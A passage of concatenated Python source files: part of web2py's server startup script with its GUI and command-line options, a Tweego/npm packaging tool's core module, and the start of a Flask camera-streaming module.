justify=Tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
Tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
applications_folder = os.path.join(self.options.folder, 'applications')
apps = []
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, 'models', 'scheduler.py'))
]
if start:
# the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
# reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
try:
t1 = os.path.getsize(httplog)
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open(httplog, 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
parser.add_option('-G',
'--GAE',
default=None,
dest='gae',
help="'-G configure' will create app.yaml and gaehandler.py")
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password))')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 second)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
parser.add_option('-e',
'--errors_to_console',
action='store_true',
dest='print_errors',
default=False,
help='log all errors to console')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed. Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
copy_options = copy.deepcopy(options)
copy_options.password = '******'
global_settings.cmd_options = copy_options
global_settings.cmd_args = args
if options.gae:
if not os.path.exists('app.yaml'):
name = raw_input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
print("app.yaml alreday exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
print("gaehandler.py alreday exists in the web2py folder")
sys.exit(0)
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
# If we have the applications package or if we should upgrade
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return options, args
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon.globals import current;current._scheduler.loop()"
else:
code = "from gluon.globals import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print("Application '%s' doesn't exist, skipping" % app_)
return None, None
return app_, code
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon.globals import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if options.folder:
os.chdir(options.folder)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print('starting single-scheduler for "%s"...' % app_)
run(app_, True, True, None, False, code)
return
# Work around OS X problem: http://bugs.python.org/issue9405
import urllib
urllib.getproxies()
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print('starting scheduler for "%s"...' % app_)
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start(cron=True):
""" Starts server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
if not options.nobanner:
print('Database drivers available: %s' % ', '.join(DRIVERS))
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print('Cannot import config file [%s]' % options.config)
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if options.folder:
os.chdir(options.folder)
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print('Using softcron (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print('Error: taskbar not supported on this platform')
sys.exit(1)
root = None
if not options.nogui and options.password == '<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print('no password, no admin interface')
# ##-X (if no tk, the widget takes care of it himself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
message = '\nplease visit:\n\t%s\n' % url
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
print(message)
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
core.py
|
import json
import logging
import multiprocessing
multiprocessing.freeze_support()
from pathlib import Path
from settings_manager import SettingsManager
import subprocess
import platform
import sys
import threading
from datetime import datetime
from queue import Queue
from threading import Thread
from constants import *
import zipimport
##
# Sorry for anyone who looks at this.
# I need to get around to refactoring
# and this is nowhere near as bad as builder.py...
# lb
##
class QueueHandler(logging.Handler):
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
self.log_queue.put(record)
def resource_path(relative_path):
try:
base_path = Path(sys._MEIPASS)
except Exception:
base_path = Path(".")
return base_path.joinpath(Path(relative_path))
class Core:
log_queue = None
logger = None
queue_handler = None
settings_manager = None
icon_type = ("Icon files", "*.ico")
ON_POSIX = 'posix' in sys.builtin_module_names
LIB_DICT_NAME = "libs"
PROJECT_DICT_NAME = "project"
AUTHOR_DICT_NAME = "author"
UPDATED_TIME_KEY = "last_updated_at"
BUILD_DIR_KEY = "build_directory"
libs = {
NPM_LOCATION: "",
NPX_LOCATION: "",
TWEEGO_LOCATION: ""
}
project = {
PROJ_NAME: "",
PROJ_DIR: "",
PROJ_HTML: "",
PROJ_PARENT_DIR: "",
PROJ_BUILD_DIR: "",
PROJ_VERSION: "1.0.0",
PROJ_DIMS_HEIGHT: "600",
PROJ_DIMS_WIDTH: "800",
PROJ_ICON_LOCATION: "",
PROJ_KEYWORDS: "",
PROJ_LAST_UPDATED: ""
}
author = {
AUTHOR_NAME: "Your Name",
AUTHOR_EMAIL: "",
AUTHOR_REPO: "",
}
# I cannot find a nicer way of doing this without installing additional packages
processes = []
entry_size = (20, 1)
system_type = platform.system()
# System dependent variables
which_command = "which"
shell = False
lock = threading.Lock()
cmd_extension = ""
WINDOWS_CMD_EXT = ".cmd"
def __init__(self):
# Set up all the logging
self.logger = logging.getLogger('TweGeT')
logging.basicConfig(level=logging.DEBUG,
format=u'%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.CRITICAL)
formatter = logging.Formatter(u'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fhandler = logging.FileHandler("twet.log", 'w', 'utf-8')
fhandler.setFormatter(formatter)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.addHandler(fhandler)
self.log_queue = Queue()
self.queue_handler = QueueHandler(self.log_queue)
self.logger.addHandler(self.queue_handler)
self.settings_manager = SettingsManager()
if self.system_type == WINDOWS:
self.which_command = "where"
self.shell = True
self.cmd_extension = self.WINDOWS_CMD_EXT
if self.system_type == DARWIN:
self.icon_type = ("Iconset", "*.icns")
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
string = str(line, encoding="utf-8")
try:
self.logger.info(string)
except:
string = line
self.logger.info(string)
out.close()
self.lock.release()
def get_bin_path(self, app_name):
try:
proc = self.test_existence(app_name)
location = proc.split("\n")[0].strip()
return location
except AssertionError:
return None
# We have a result, now grab the first line of output
# Windows note: the first location returned /tends/ to be the binary itself
def run_command_with_output(self, commands, cwd=None):
process = subprocess.Popen(commands, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE,
shell=False,
bufsize=0, text=None, cwd=cwd)
self.processes.append(process)
t = Thread(target=self.enqueue_output, args=(process.stdout, self.log_queue))
self.lock.acquire(blocking=False)
t.start()
# Warning: Blocking
def run_command_store_output(self, commands, cwd=None):
process = subprocess.Popen(commands, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False,
bufsize=0, text=None, cwd=cwd)
output = ""
for line in iter(process.stdout.readline, b''):
output += str(line, encoding="utf-8")
process.stdout.close()
return output
def find_dependencies(self):
res = self.get_bin_path(NPM) if not None else self.settings_manager.find_setting(NPM)
if res == "":
self.logger.info(
"NPM cannot be found. It is likely not installed. Please visit https://www.npmjs.com/get-npm to install")
self.libs[NPM_LOCATION] = res
res = self.get_bin_path(NPX) if not None else self.settings_manager.find_setting(NPX)
if res == "":
self.logger.info(
"NPX cannot be found. It is likely not installed. Please visit https://www.npmjs.com/get-npm to install")
self.libs[NPX_LOCATION] = res
res = self.get_bin_path(TWEEGO) if not None else self.settings_manager.find_setting(TWEEGO)
if res == "":
self.logger.info(
"Tweego cannot be found. Either locate its executable or install from https://www.motoslave.net/tweego/")
self.libs[TWEEGO_LOCATION] = res
# TODO Still need to test for StoryFormats
def test_existence(self, app_name):
the_process = subprocess.run([self.which_command, app_name], universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE,
shell=self.shell)
assert (the_process.stderr == '')
return the_process.stdout
def create_lock_file(self, path):
publish_time_stamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
build_dir = str(path)
# Build the data before writing it to file
data = {self.UPDATED_TIME_KEY: publish_time_stamp, self.BUILD_DIR_KEY: build_dir,
self.AUTHOR_DICT_NAME: self.author, self.LIB_DICT_NAME: self.libs, self.PROJECT_DICT_NAME: self.project}
with open(path.joinpath(DETAILS_FILE_NAME), 'w', encoding="utf-8") as f:
json.dump(data, fp=f, ensure_ascii=False, indent=4, sort_keys=True)
def load_lock_file(self, path):
# returns a tuple of the dictionaries
# This method ensures that dictionary structure won't be affected
with open(path, 'r', encoding="utf-8") as f:
data = json.load(f)
self.libs = data[self.LIB_DICT_NAME]
self.project = data[self.PROJECT_DICT_NAME]
self.author = data[self.AUTHOR_DICT_NAME]
def update_package_json(self, path):
data = None
with open(path, 'r', encoding="utf-8") as f:
data = json.load(f)
# keywords = data["keywords"]
data["keywords"] = self.project[PROJ_KEYWORDS].split(",")
data["author"]["name"] = self.author[AUTHOR_NAME]
data["author"]["email"] = self.author[AUTHOR_EMAIL]
data["repository"] = self.author[AUTHOR_EMAIL]
data["version"] = self.project[PROJ_VERSION]
data["config"]["forge"]["packagerConfig"] = {"icon": "icon"}
with open(path, 'w', encoding="utf-8") as f:
json.dump(data, fp=f, indent=4)
def terminate_processes(self):
# this == ugly but it'll work until I improve it
self.logger.info("Ending other tasks")
for p in self.processes:
if p.returncode is None:
p.terminate()
self.logger.info("All tasks finished, can safely close now.")
def replace_js_parameters(self, path):
js = None
with open(resource_path(INDEX_JS_TEMPLATE_PATH), 'r') as f:
js = f.read()
js = js.replace(JS_HEIGHT_KEY, self.project[PROJ_DIMS_HEIGHT]).replace(JS_WIDTH_KEY,
self.project[PROJ_DIMS_WIDTH])
with open(path, 'w') as f:
f.write(js)
def write_settings(self):
self.settings_manager.write_out_settings(self.libs)
def read_settings(self):
m, x, t = self.settings_manager.read_in_settings()
if m is None and x is None and t is None:
return
if self.libs[NPM_LOCATION] == "":
self.libs[NPM_LOCATION] = m
if self.libs[NPX_LOCATION] == "":
self.libs[NPX_LOCATION] = x
if self.libs[TWEEGO_LOCATION] == "":
self.libs[TWEEGO_LOCATION] = t
|
vilib.py
|
import numpy as np
import cv2
import threading
from importlib import import_module
import os
from flask import Flask, render_template, Response
from multiprocessing import Process, Manager
import time
from utils import cpu_temperature
# from rgb_matrix import RGB_Matrix
app = Flask(__name__)
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen():
"""Video streaming generator function."""
while True:
# frame = cv2.imread("123.jpeg")Vilib.q.get()
# print("1")
# if Vilib.conn2.recv()
# frame = cv2.imencode('.jpg', Vilib.conn2.recv())[1].tobytes()
# rt_img = np.ones((320,240),np.uint8)
# print("2")
frame = cv2.imencode('.jpg', Vilib.img_array[0])[1].tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/mjpg')
def video_feed():
# from camera import Camera
